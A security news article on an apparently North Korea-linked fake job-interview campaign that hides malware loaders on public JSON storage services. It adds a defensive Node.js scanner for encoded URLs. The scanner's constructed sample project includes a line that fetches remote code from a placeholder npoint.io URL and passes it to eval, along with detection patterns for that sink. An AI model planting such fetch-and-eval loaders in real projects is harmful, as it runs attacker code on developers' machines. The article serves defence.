North Korea-Linked ‘Job Interview’ Trap Evolves: JSON Storage Used to Host Malware

A threat campaign associated with North Korean cyber operators has significantly expanded its capabilities by using public JSON storage services as covert malware hosts. Security researchers report that the long-running operation, known as Contagious Interview, now relies on platforms such as JSON Keeper, JSON Silo and npoint.io to store and distribute malicious code during fake job test scenarios. This marks one of the most technically advanced iterations of the campaign, which continues to target developers, blockchain engineers and Web3 professionals across the globe.

How the Attack Works

The attack begins with a convincing recruiter outreach that invites the victim to take part in a skills assessment or coding test. The victim receives a compressed archive or Git repository containing what looks like legitimate source code. Embedded in the project are values that pose as ordinary environment variables or helper-script settings. When decoded, they resolve to URLs on public JSON storage services, and the JSON documents at those URLs contain obfuscated JavaScript that serves as the primary malware loader.

Once the victim runs the project under Node.js, the loader retrieves and executes the first-stage infostealer known as BeaverTail. This malware is built to harvest extensive system information, browser credentials, session data, cryptocurrency wallet details and high-value local documents.

It also takes screenshots and checks for security tools. After this reconnaissance phase, the malware deploys a second-stage component called InvisibleFerret, a modular remote access tool that can download additional payloads, run commands and maintain persistent access on Windows, Linux and macOS.

The Level and Nature of the Threat

The use of public JSON storage significantly complicates detection. Security tools often treat traffic to well-known public JSON services as benign, so the attackers' infrastructure blends into ordinary developer traffic.

Developers routinely pull JSON-based configuration from such platforms, so the malicious requests look entirely legitimate. Some of the attack samples hide configuration files in nested directories such as .config, or in server-side variable files, containing base64-encoded strings that decode to URLs of the JSON-hosted loaders. Because these files mimic the layout of a real development project, investigators warn that many victims may never notice anything unusual.
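One practical check for the delivery pattern described above is to scan a candidate "test assignment" before running it: decode any base64-looking values in its config and env files, pull URLs out of the decoded text, and flag those that point at public JSON storage, plus any source file that feeds network content into an eval-style sink. The script below is an added example written for this article; it is not code from the researchers or from the campaign. The host list is an assumption about the domains used by the services named above (JSON Keeper, JSON Silo, npoint.io) and should be confirmed against current threat intelligence; the sample project is constructed inline and is not a real artefact.

```javascript
// Added example, not code from the article or the campaign.
// Scans an in-memory "project" for base64-encoded URLs that point at public
// JSON storage services, and for network-fetch-into-eval patterns.

// ASSUMPTION: domains of the JSON storage services named in the article.
const SUSPECT_HOSTS = ['jsonkeeper.com', 'jsonsilo.com', 'npoint.io'];

// Tokens that look like base64: 16+ base64 chars, optional padding.
const B64_TOKEN = /[A-Za-z0-9+/]{16,}={0,2}/g;

// Return every base64-looking token in `text` that really decodes to printable ASCII.
function decodeBase64Candidates(text) {
  const out = [];
  for (const tok of text.match(B64_TOKEN) || []) {
    const buf = Buffer.from(tok, 'base64');
    // Round-trip check: ordinary identifiers that happen to match the charset
    // (e.g. "ConfigurationLoader") do not re-encode to themselves.
    if (buf.toString('base64').replace(/=+$/, '') !== tok.replace(/=+$/, '')) continue;
    const decoded = buf.toString('latin1');
    if (!/^[\x20-\x7e\r\n\t]+$/.test(decoded)) continue; // binary garbage, skip
    out.push(decoded);
  }
  return out;
}

// Extract http(s) URLs from a decoded string and keep those on suspect hosts
// (exact host or any subdomain, e.g. api.npoint.io).
function suspectUrls(decoded) {
  const found = [];
  for (const m of decoded.match(/https?:\/\/[^\s"'`<>]+/g) || []) {
    let host;
    try { host = new URL(m).hostname.toLowerCase(); } catch { continue; }
    if (SUSPECT_HOSTS.some(h => host === h || host.endsWith('.' + h))) found.push(m);
  }
  return found;
}

// Scan a map of relative path -> file contents. Returns a list of findings.
function scanProject(files) {
  const findings = [];
  for (const [path, content] of Object.entries(files)) {
    for (const decoded of decodeBase64Candidates(content)) {
      for (const url of suspectUrls(decoded)) findings.push({ path, url });
    }
    // Second half of the pattern: remote content handed to a code-execution sink.
    const hasSink = /\b(eval|new Function|vm\.runIn\w+)\s*\(/.test(content);
    const hasFetch = /\b(fetch|axios|https?\.get|request)\s*\(/.test(content);
    if (hasSink && hasFetch) {
      findings.push({ path, url: null, note: 'network fetch feeding an eval-style sink' });
    }
  }
  return findings;
}

// Constructed sample project (not a real campaign artefact). The encoded value is
// produced at runtime so the demo stays correct; real samples ship it pre-encoded.
const encodedUrl = Buffer.from('https://api.npoint.io/0123456789abcdef').toString('base64');
const SAMPLE_PROJECT = {
  '.env': `PORT=3000\nDB_HOST=localhost\nREACT_APP_API_KEY=${encodedUrl}\n`,
  '.config/server.js': [
    "const cfg = Buffer.from(process.env.REACT_APP_API_KEY, 'base64').toString();",
    'fetch(cfg).then(r => r.text()).then(src => eval(src));',
  ].join('\n'),
  'src/index.js': "console.log('hello world');",
};

console.log(JSON.stringify(scanProject(SAMPLE_PROJECT), null, 2));
```

Run it with `node scan.js` against a project loaded into the `files` map (reading the tree from disk is left to the caller). The heuristic catches only one encoding; string splitting, hex, reversed strings or a second base64 layer will slip past it, so treat a clean result as a reason to look harder, not as a pass, and pair it with egress monitoring for requests to these hosts from build or dev machines.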

This technique represents an escalation in North Korea's cyber activity. Historically, operators linked to the DPRK relied on phishing documents, infected installers or trojanized blockchain tools. By shifting to supply-chain-style delivery through developer workflows, the attackers gain a more reliable foothold with less exposure. Security researchers note that the threat actors deliberately target individuals with access to digital assets, source repositories or infrastructure credentials, which points to both espionage and financial motives. With crypto theft remaining a key revenue stream for North Korea, this campaign aligns with past activity attributed to groups such as Lazarus and Kimsuky.

Researchers describe this attack as one of the clearest examples of how modern developer workflows can be weaponized.